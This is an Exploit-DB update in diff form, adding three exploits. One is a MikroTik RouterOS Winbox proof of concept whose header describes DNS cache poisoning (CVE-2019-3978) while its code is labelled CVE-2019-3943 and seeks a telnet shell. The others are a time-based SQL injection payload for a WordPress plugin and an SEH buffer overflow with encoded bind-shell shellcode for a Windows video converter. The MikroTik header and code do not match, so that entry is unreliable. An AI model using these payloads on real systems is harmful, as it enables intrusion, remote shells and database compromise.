DB: 2019-11-01

3 changes to exploits/shellcodes

WMV to AVI MPEG DVD WMV Convertor 4.6.1217 - Buffer OverFlow (SEH)

MikroTik RouterOS 6.45.6 - DNS Cache Poisoning

CommSy 8.6.5 - SQL injection

Wordpress Plugin Google Review Slider 6.1 - 'tid' SQL Injection

exploits/hardware/remote/47566.cpp

@@ -0,0 +1,310 @@
+# Exploit Title: MikroTik RouterOS 6.45.6 - DNS Cache Poisoning
+# Date: 2019-10-30
+# Exploit Author: Jacob Baines
+# Vendor Homepage: https://mikrotik.com/
+# Software Link: https://mikrotik.com/download
+# Version: 6.45.6 Stable (and below) or 6.44.5 Long-term (and below)
+# Tested on: Various x86 and MIPSBE RouterOS installs
+# CVE : CVE-2019-3978
+# Writeup: https://medium.com/tenable-techblog/routeros-chain-to-root-f4e0b07c0b21
+# Disclosure: https://www.tenable.com/security/research/tra-2019-46
+
+# Unauthenticated DNS request via Winbox
+# RouterOS before 6.45.7 (stable) and 6.44.6 (Long-term) allowed an unauthenticated remote user trigger DNS requests 
+# to a user specified DNS server via port 8291 (winbox). The DNS response then gets cached by RouterOS, setting up 
+# a perfect situation for unauthenticated DNS cache poisoning. This is assigned CVE-2019-3978.
+
+# This PoC takes a target ip/port (router) and a DNS server (e.g. 8.8.8.8). 
+# The PoC will always send a DNS request for example.com. In the following write up, 
+# I detail how to use this to poison the routers cache:
+
+# https://medium.com/tenable-techblog/routeros-chain-to-root-f4e0b07c0b21
+
+# Note that the writup focuses on router's configured *without* the DNS server enabled. 
+# Obviously this attack is significantly more powerful when downstream clients use the router as a DNS server.
+
+## What are the build dependencies?
+# This requires:
+
+# * Boost 1.66 or higher
+# * cmake
+
+## How do I build this jawn?
+
+# Just normal cmake. Try this:
+
+# ```sh
+# mkdir build
+# cd build
+# cmake ..
+# make
+# ```
+
+# Resolve dependencies as needed.
+
+## Usage Example
+
+# ```sh
+# albinolobster@ubuntu:~/routeros/poc/winbox_dns_request/build$ ./winbox_dns_request -i 192.168.1.50 -p 8291 -s 8.8.8.8
+# -> {bff0005:1,u1:134744072,uff0006:1,uff0007:3,s3:'example.com',Uff0001:[14]}
+# <- {u4:584628317,uff0003:2,uff0006:1,s3:'example.com',U6:[584628317],U7:[21496],Uff0001:[],Uff0002:[14],S5:['example.com']}
+# albinolobster@ubuntu:~/routeros/poc/winbox_dns_request/build$ ssh admin@192.168.1.50
+# ...
+# [admin@MikroTik] > ip dns cache print
+# Flags: S - static
+# #   NAME                               ADDRESS                                                              TTL        
+# 0   example.com                        93.184.216.34                                                        5h57m57s    
+# [admin@MikroTik] >
+# ```
+
+# Source:
+# https://github.com/tenable/routeros/tree/master/poc/winbox_dns_request
+
+
+/*
+    Copyright 2019 Tenable, Inc.                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                *
+
+    Redistribution and use in source and binary forms, with or without modification,
+    are permitted provided that the following conditions are met:
+
+    1. Redistributions of source code must retain the above copyright notice, this
+        list of conditions and the following disclaimer.
+
+    2. Redistributions in binary form must reproduce the above copyright notice,
+        this list of conditions and the following disclaimer in the documentation
+        and/or other materials provided with the distribution.
+
+    3. Neither the name of the copyright holder nor the names of its contributors
+        may be used to endorse or promote products derived from this software
+        without specific prior written permission.
+
+    THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+    AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+    IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+    ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
+    LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+    CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+    SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+    INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+    CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+    ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
+    POSSIBILITY OF SUCH DAMAGE.
+*/
+#include <fstream>
+#include <cstdlib>
+#include <iostream>
+#include <boost/cstdint.hpp>
+#include <boost/program_options.hpp>
+#include <boost/algorithm/string.hpp>
+
+#include "winbox_session.hpp"
+#include "winbox_message.hpp"
+
+namespace
+{
+    const char s_version[] = "CVE-2019-3943 PoC Using SNMP dlopen";
+
+    bool parseCommandLine(int p_argCount, const char* p_argArray[],
+                          std::string& p_username, std::string& p_password,
+                          std::string& p_ip, std::string& p_port)
+    {
+        boost::program_options::options_description description("options");
+        description.add_options()
+        ("help,h", "A list of command line options")
+        ("version,v", "Display version information")
+        ("username,u", boost::program_options::value<std::string>(), "The user to log in as")
+        ("password", boost::program_options::value<std::string>(), "The password to log in with")
+        ("port,p", boost::program_options::value<std::string>()->default_value("8291"), "The Winbox port to connect to")
+        ("ip,i", boost::program_options::value<std::string>(), "The IPv4 address to connect to");
+
+        boost::program_options::variables_map argv_map;
+        try
+        {
+            boost::program_options::store(
+                boost::program_options::parse_command_line(
+                    p_argCount, p_argArray, description), argv_map);
+        }
+        catch (const std::exception& e)
+        {
+            std::cerr << e.what() << "\n" << std::endl;
+            std::cerr << description << std::endl;
+            return false;
+        }
+
+        boost::program_options::notify(argv_map);
+        if (argv_map.empty() || argv_map.count("help"))
+        {
+            std::cerr << description << std::endl;
+            return false;
+        }
+
+        if (argv_map.count("version"))
+        {
+            std::cerr << "Version: " << ::s_version << std::endl;
+            return false;
+        }
+
+        if (argv_map.count("username") && argv_map.count("ip") &
+            argv_map.count("port"))
+        {
+            p_username.assign(argv_map["username"].as<std::string>());
+            p_ip.assign(argv_map["ip"].as<std::string>());
+            p_port.assign(argv_map["port"].as<std::string>());
+
+            if (argv_map.count("password"))
+            {
+                p_password.assign(argv_map["password"].as<std::string>());
+            }
+            else
+            {
+                p_password.assign("");
+            }
+            return true;
+        }
+        else
+        {
+            std::cerr << description << std::endl;
+        }
+
+        return false;
+    }
+}
+
+int main(int p_argc, const char** p_argv)
+{
+    std::string username;
+    std::string password;
+    std::string ip;
+    std::string port;
+    if (!parseCommandLine(p_argc, p_argv, username, password, ip, port))
+    {
+        return EXIT_FAILURE;
+    }
+    Winbox_Session winboxSession(ip, port);
+    if (!winboxSession.connect())
+    {
+        std::cerr << "Failed to connect to the remote host" << std::endl;
+        return EXIT_FAILURE;
+    }
+
+    boost::uint32_t p_session_id = 0;
+    if (!winboxSession.login(username, password, p_session_id))
+    {
+        std::cerr << "[-] Login failed." << std::endl;
+        return false;
+    }
+
+    WinboxMessage msg;
+    msg.set_to(0x4c);
+    msg.set_command(0xa0065);
+    msg.set_request_id(1);
+    msg.set_reply_expected(true);
+    msg.add_u32(5,80); // height
+    msg.add_u32(6,24); // width
+    msg.add_u32(8,1);  // controls method. 0 (nova/bin/login), 1 (telnet), 2 (ssh), 3 (mactel), 4 (nova/bin/telser), default...
+    msg.add_string(0x0a, username); //username
+    msg.add_string(1,"");
+    msg.add_string(7, "vt102");
+    msg.add_string(9, "-l a"); // drop into telnet client shell
+    winboxSession.send(msg);
+
+    msg.reset();
+    if (!winboxSession.receive(msg))
+    {
+        std::cerr << "Error receiving a response." << std::endl;
+        return EXIT_FAILURE;
+    }
+
+    if (msg.has_error())
+    {
+        std::cout << "error: " << msg.get_error_string() << std::endl;
+    }
+
+    boost::uint32_t session_id = msg.get_u32(0xfe0001);
+
+    msg.reset();
+    msg.set_to(0x4c);
+    msg.set_command(0xa0068);
+    msg.set_request_id(2);
+    msg.set_reply_expected(true);
+    msg.add_u32(5,82);
+    msg.add_u32(6,24);
+    msg.add_u32(0xfe0001, session_id);
+    winboxSession.send(msg);
+
+    boost::uint32_t tracker = 0;
+    msg.reset();
+    if (!winboxSession.receive(msg))
+    {
+        std::cerr << "Error receiving a response." << std::endl;
+        return EXIT_FAILURE;
+    }
+
+    msg.reset();
+    msg.set_to(0x4c);
+    msg.set_command(0xa0067);
+    msg.set_request_id(3);
+    msg.set_reply_expected(true);
+    msg.add_u32(3, tracker);
+    msg.add_u32(0xfe0001, session_id);
+    winboxSession.send(msg);
+
+    msg.reset();
+    if (!winboxSession.receive(msg))
+    {
+        std::cerr << "Error receiving a response." << std::endl;
+        return EXIT_FAILURE;
+    }
+
+    if (msg.has_error())
+    {
+        std::cout << msg.serialize_to_json() << std::endl;
+        std::cout << "error: " << msg.get_error_string() << std::endl;
+        return EXIT_FAILURE;
+    }
+    else if (!msg.get_raw(0x02).empty())
+    {
+        std::string raw_payload(msg.get_raw(0x02));
+        tracker += raw_payload.size();
+    }
+
+    //{u3:1047,ufe0001:0,uff0007:655463,r2:[115],Uff0001:[76],Uff0002:[0,456]}
+    msg.reset();
+    msg.set_to(0x4c);
+    msg.set_command(0xa0067);
+    msg.set_request_id(4);
+    msg.set_reply_expected(true);
+    msg.add_u32(3, tracker);
+    msg.add_u32(0xfe0001, session_id);
+    msg.add_raw(2, "set tracefile /pckg/option\n");
+    winboxSession.send(msg);
+
+    bool found_telnet_prompt = false;
+    while (!found_telnet_prompt)
+    {
+        msg.reset();
+        if (!winboxSession.receive(msg))
+        {
+            std::cerr << "Error receiving a response." << std::endl;
+            return EXIT_FAILURE;
+        }
+
+        if (msg.has_error())
+        {
+            std::cout << msg.serialize_to_json() << std::endl;
+            std::cout << "error: " << msg.get_error_string() << std::endl;
+            return EXIT_FAILURE;
+        }
+        else if (!msg.get_raw(0x02).empty())
+        {
+            std::string raw_payload(msg.get_raw(0x02));
+            if (raw_payload.find("telnet> ") != std::string::npos)
+            {
+                std::cout << "Success!" << std::endl;
+                found_telnet_prompt = true;
+            }
+        }
+    }
+
+    return EXIT_SUCCESS;
+}

exploits/php/webapps/47567.txt

@@ -0,0 +1,30 @@
+# Exploit Title: Wordpress Plugin Google Review Slider 6.1 - 'tid' SQL Injection
+# Google Dork: inurl:"/wp-content/plugins/wp-google-places-review-slider/"
+# Date: 2019-07-02
+# Exploit Author: Princy Edward
+# Exploit Author Blog : https://prinyedward.blogspot.com/
+# Vendor Homepage: https://wordpress.org/plugins/wp-google-places-review-slider/
+# Version: 6.1
+# Tested on: Apache/2.2.24 (CentOS)
+# CVE : 
+
+#POC :
+
+GET/wp-admin/admin.php?page=wp_google-templates_posts&tid=1&_wpnonce=***
+&taction=edit HTTP/1.1
+
+#SQLMAP Result :
+sqlmap identified the following injection point(s) with a total of 62 HTTP(s) requests:
+---
+Parameter: tid (GET)
+Type: time-based blind
+Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+Payload: page=wp_google-templates_posts&tid=1 AND (SELECT 5357 FROM
+(SELECT(SLEEP(5)))kHQz)&_wpnonce=***&taction=edit
+
+# Changeset:
+# Issue fixed in version 6.2
+# https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=2180197%40wp-google-places-review-slider&old=2163061%40wp-google-places-review-slider&sfp_email=&sfph_mail=
+
+Cheers!
+PrincyEdward

exploits/windows/local/47568.py

@@ -0,0 +1,59 @@
+# Exploit Title: WMV to AVI MPEG DVD WMV Convertor 4.6.1217 - Buffer OverFlow (SEH)
+# Google Dork: N/A
+# Date: 2019-10-30
+# Exploit Author: Doan Nguyen (4ll4u)
+# Vendor Homepage:https://www.alloksoft.com/
+# Software Link:  https://www.alloksoft.com/wmv.htm
+# Version: v4.6.1217
+# Tested on: Windows XP SP3
+# CVE : N/A
+# Reference from : [1] https://www.exploit-db.com/exploits/47563        
+
+# 1.- Run python code :poc.py
+# 2.- Open EVIL.txt and copy content to clipboard
+# 3.- Open  WMV to AVI MPEG DVD WMV Convertor and Click 'EnterKey'
+# 4.- Paste the content of EVIL.txt into the Field: 'License Name and License Code'
+# 5.- Click 'OK' and you will get a bind shell on port 4444
+
+#msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -b '\x00' -f hex
+#We need to create meaningful characters when pasting into the password on the application (allow characters include:\x21->\x7E in ASCII TABLE)
+shellcode = (
+"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x53\x2A\x52\x25\x2D\x53\x2A\x52\x25\x2D\x55\x2A\x52\x25\x50"
+"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x23\x34\x4D\x68\x2D\x23\x34\x4D\x68\x2D\x24\x36\x4D\x69\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x62\x5C\x30\x75\x2D\x62\x5C\x30\x75\x2D\x62\x5E\x31\x75\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x60\x73\x71\x3B\x2D\x60\x73\x71\x3B\x2D\x61\x75\x73\x3D\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x4B\x39\x6F\x40\x2D\x4B\x39\x6F\x40\x2D\x4C\x39\x70\x40\x50"
+"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x62\x47\x44\x27\x2D\x62\x47\x44\x27\x2D\x63\x47\x45\x27\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x38\x49\x2A\x35\x2D\x38\x49\x2A\x35\x2D\x38\x49\x2A\x36\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x5D\x71\x68\x26\x2D\x5D\x71\x68\x26\x2D\x5D\x71\x6A\x28\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x47\x21\x25\x28\x2D\x47\x21\x25\x28\x2D\x49\x22\x27\x29\x50"
+"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x44\x56\x34\x3C\x2D\x44\x56\x34\x3C\x2D\x45\x58\x35\x3C\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x57\x31\x33\x44\x2D\x57\x31\x33\x44\x2D\x58\x32\x34\x45\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3C\x6E\x4F\x50\x2D\x3C\x6E\x4F\x50\x2D\x3E\x70\x50\x52\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3F\x38\x33\x5F\x2D\x3F\x38\x33\x5F\x2D\x40\x39\x33\x60\x50"
+"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x6F\x4D\x38\x22\x2D\x6F\x4D\x38\x22\x2D\x6F\x4F\x3A\x24\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x62\x72\x56\x55\x2D\x62\x72\x56\x55\x2D\x63\x74\x58\x55\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x4B\x66\x52\x53\x2D\x4B\x66\x52\x53\x2D\x4C\x67\x52\x54\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3B\x22\x35\x71\x2D\x3B\x22\x35\x71\x2D\x3C\x22\x37\x72\x50"
+"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x2E\x4F\x64\x55\x2D\x2E\x4F\x64\x55\x2D\x2E\x51\x65\x55\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x59\x48\x59\x5A\x2D\x59\x48\x59\x5A\x2D\x5B\x4A\x59\x5B\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x49\x62\x5C\x5A\x2D\x49\x62\x5C\x5A\x2D\x4A\x64\x5C\x5C\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x63\x54\x2A\x47\x2D\x63\x54\x2A\x47\x2D\x65\x55\x2A\x47\x50"
+"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x48\x4D\x4D\x43\x2D\x48\x4D\x4D\x43\x2D\x49\x4F\x4E\x45\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x30\x75\x60\x3A\x2D\x30\x75\x60\x3A\x2D\x32\x75\x60\x3A\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x60\x6B\x3F\x52\x2D\x60\x6B\x3F\x52\x2D\x60\x6D\x40\x54\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3F\x47\x21\x58\x2D\x3F\x47\x21\x58\x2D\x3F\x49\x22\x58\x50"
+"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x65\x4E\x25\x4A\x2D\x65\x4E\x25\x4A\x2D\x65\x4E\x27\x4C\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3E\x35\x60\x46\x2D\x3E\x35\x60\x46\x2D\x3E\x37\x60\x46\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x45\x2E\x2D\x41\x2D\x45\x2E\x2D\x41\x2D\x45\x30\x2E\x42\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x6C\x4B\x74\x4C\x2D\x6C\x4B\x74\x4C\x2D\x6E\x4C\x74\x4C\x50"
+"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x42\x43\x29\x26\x2D\x42\x43\x29\x26\x2D\x43\x43\x2A\x27\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x2F\x61\x43\x34\x2D\x2F\x61\x43\x34\x2D\x31\x61\x45\x34\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x50\x58\x4B\x69\x2D\x50\x58\x4B\x69\x2D\x52\x59\x4D\x6A\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x71\x29\x29\x39\x2D\x71\x29\x29\x39\x2D\x73\x2B\x2A\x39\x50"
+"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x54\x68\x52\x6D\x2D\x54\x68\x52\x6D\x2D\x55\x68\x52\x6D\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x20\x3C\x5B\x64\x2D\x20\x3C\x5B\x64\x2D\x21\x3E\x5B\x66\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x58\x6E\x65\x6B\x2D\x58\x6E\x65\x6B\x2D\x5A\x6F\x67\x6B\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x69\x26\x52\x23\x2D\x69\x26\x52\x23\x2D\x69\x27\x54\x25\x50"
+"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x46\x3F\x27\x71\x2D\x46\x3F\x27\x71\x2D\x48\x40\x29\x72\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3C\x24\x52\x54\x2D\x3C\x24\x52\x54\x2D\x3E\x26\x54\x54\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x5C\x40\x4F\x55\x2D\x5C\x40\x4F\x55\x2D\x5D\x40\x51\x57\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x6A\x5C\x33\x58\x2D\x6A\x5C\x33\x58\x2D\x6A\x5C\x34\x59\x50"
+"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x5F\x3E\x5A\x5D\x2D\x5F\x3E\x5A\x5D\x2D\x5F\x40\x5C\x5E\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x49\x4D\x6A\x3B\x2D\x49\x4D\x6A\x3B\x2D\x4A\x4F\x6C\x3C\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x62\x23\x6B\x3D\x2D\x62\x23\x6B\x3D\x2D\x63\x23\x6B\x3F\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x23\x6A\x57\x67\x2D\x23\x6A\x57\x67\x2D\x24\x6C\x57\x67\x50"
+"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x23\x43\x60\x50\x2D\x23\x43\x60\x50\x2D\x25\x43\x60\x50\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x73\x31\x34\x2A\x2D\x73\x31\x34\x2A\x2D\x73\x33\x34\x2B\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x38\x56\x63\x59\x2D\x38\x56\x63\x59\x2D\x39\x56\x65\x59\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x40\x52\x60\x66\x2D\x40\x52\x60\x66\x2D\x41\x53\x61\x67\x50"
+"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x24\x61\x73\x2A\x2D\x24\x61\x73\x2A\x2D\x26\x61\x75\x2A\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x48\x34\x53\x66\x2D\x48\x34\x53\x66\x2D\x48\x34\x54\x68\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3C\x26\x57\x26\x2D\x3C\x26\x57\x26\x2D\x3C\x27\x58\x27\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x54\x63\x3A\x27\x2D\x54\x63\x3A\x27\x2D\x54\x63\x3A\x27\x50"
+"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x26\x26\x2F\x50\x2D\x26\x26\x2F\x50\x2D\x27\x27\x2F\x51\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x30\x52\x2E\x62\x2D\x30\x52\x2E\x62\x2D\x30\x54\x30\x63\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x31\x5A\x75\x73\x2D\x31\x5A\x75\x73\x2D\x32\x5B\x75\x75\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x36\x41\x66\x56\x2D\x36\x41\x66\x56\x2D\x36\x42\x68\x57\x50"
+"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x36\x63\x50\x32\x2D\x36\x63\x50\x32\x2D\x36\x63\x51\x33\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x59\x4B\x23\x26\x2D\x59\x4B\x23\x26\x2D\x5A\x4C\x24\x27\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x28\x68\x4A\x4D\x2D\x28\x68\x4A\x4D\x2D\x2A\x69\x4B\x4F\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x2E\x41\x53\x6A\x2D\x2E\x41\x53\x6A\x2D\x30\x42\x55\x6A\x50"
+"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x6F\x6A\x2F\x6D\x2D\x6F\x6A\x2F\x6D\x2D\x6F\x6A\x2F\x6E\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x2C\x44\x30\x30\x2D\x2C\x44\x30\x30\x2D\x2D\x46\x30\x31\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x4A\x67\x69\x4F\x2D\x4A\x67\x69\x4F\x2D\x4A\x69\x69\x51\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x65\x44\x45\x68\x2D\x65\x44\x45\x68\x2D\x66\x44\x45\x6A\x50"
+"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x6F\x57\x32\x45\x2D\x6F\x57\x32\x45\x2D\x6F\x59\x34\x47\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x35\x2C\x45\x43\x2D\x35\x2C\x45\x43\x2D\x37\x2C\x46\x45\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x69\x4A\x5A\x6D\x2D\x69\x4A\x5A\x6D\x2D\x6A\x4A\x5C\x6F\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x2F\x54\x6B\x5E\x2D\x2F\x54\x6B\x5E\x2D\x2F\x56\x6B\x60\x50"
+"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x40\x25\x6E\x55\x2D\x40\x25\x6E\x55\x2D\x41\x26\x6E\x57\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x52\x6F\x33\x2D\x2D\x52\x6F\x33\x2D\x2D\x52\x70\x33\x2F\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3A\x6E\x6D\x3D\x2D\x3A\x6E\x6D\x3D\x2D\x3B\x6E\x6E\x3E\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x4E\x3D\x41\x4F\x2D\x4E\x3D\x41\x4F\x2D\x4F\x3D\x42\x4F\x50"
+"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x49\x28\x48\x64\x2D\x49\x28\x48\x64\x2D\x4A\x28\x49\x64\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x73\x2E\x5A\x59\x2D\x73\x2E\x5A\x59\x2D\x74\x2E\x5A\x59\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x4E\x68\x29\x3A\x2D\x4E\x68\x29\x3A\x2D\x4F\x68\x2B\x3B\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x21\x32\x38\x36\x2D\x21\x32\x38\x36\x2D\x22\x32\x38\x36\x50"
+"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x53\x4C\x2B\x47\x2D\x53\x4C\x2B\x47\x2D\x54\x4C\x2B\x47\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x5C\x2F\x47\x6B\x2D\x5C\x2F\x47\x6B\x2D\x5E\x31\x47\x6B\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x6D\x35\x37\x5C\x2D\x6D\x35\x37\x5C\x2D\x6D\x35\x39\x5D\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x28\x35\x41\x22\x2D\x28\x35\x41\x22\x2D\x28\x36\x43\x22\x50"
+"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x2D\x40\x6F\x2B\x2D\x2D\x40\x6F\x2B\x2D\x2F\x41\x6F\x2C\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x20\x42\x3C\x2B\x2D\x20\x42\x3C\x2B\x2D\x21\x43\x3E\x2D\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3F\x4E\x54\x2B\x2D\x3F\x4E\x54\x2B\x2D\x3F\x50\x54\x2B\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x29\x69\x53\x44\x2D\x29\x69\x53\x44\x2D\x2B\x6A\x54\x46\x50"
+"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x62\x6B\x6F\x39\x2D\x62\x6B\x6F\x39\x2D\x62\x6C\x6F\x39\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x67\x6C\x40\x26\x2D\x67\x6C\x40\x26\x2D\x69\x6E\x41\x27\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x49\x59\x36\x44\x2D\x49\x59\x36\x44\x2D\x4A\x59\x37\x46\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x61\x68\x61\x2E\x2D\x61\x68\x61\x2E\x2D\x61\x68\x63\x2E\x50"
+"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x70\x6f\x6f\x6f\x50\x50\x50" # push 12 NOP 
+)
+
+alignment = "\x54\x58\x2d\x54\x54\x54\x54\x2d\x37\x63\x54\x54\x2d\x25\x31\x57\x57\x50\x5C" # stack alignment 001292C0 - 0012AA10
+jump_short = "\x90\x90\xEB\x08"  # jump to 00129A44
+pop_pop_ret ="\x09\x9a\x01\x10" # pop pop ret in SkinMagic.dll
+buffer = "\x41" * 780 + jump_short + pop_pop_ret + "\x41\x41\x41\x41" + alignment + shellcode + (6000 - 780 - 4 - 4 - len(shellcode) - len(alignment)) * "\x45"
+
+try:
+    f=open("shell.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(buffer)
+    f.write(buffer)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"

files_exploits.csv

@@ -10739,6 +10739,7 @@ id,file,description,date,author,type,platform,port
 47549,exploits/windows/local/47549.txt,"JumpStart 0.6.0.0 - 'jswpbapi' Unquoted Service Path",2019-10-28,"Roberto Escamilla",local,windows,
 47551,exploits/windows/local/47551.py,"ChaosPro 2.0 - Buffer Overflow (SEH)",2019-10-28,SYANiDE,local,windows,
 47556,exploits/windows/local/47556.txt,"Intelligent Security System SecurOS Enterprise 10.2 - 'SecurosCtrlService' Unquoted Service Path",2019-10-29,"Alberto Vargas",local,windows,
+47568,exploits/windows/local/47568.py,"WMV to AVI MPEG DVD WMV Convertor 4.6.1217 - Buffer OverFlow (SEH)",2019-10-31,4ll4u,local,windows,
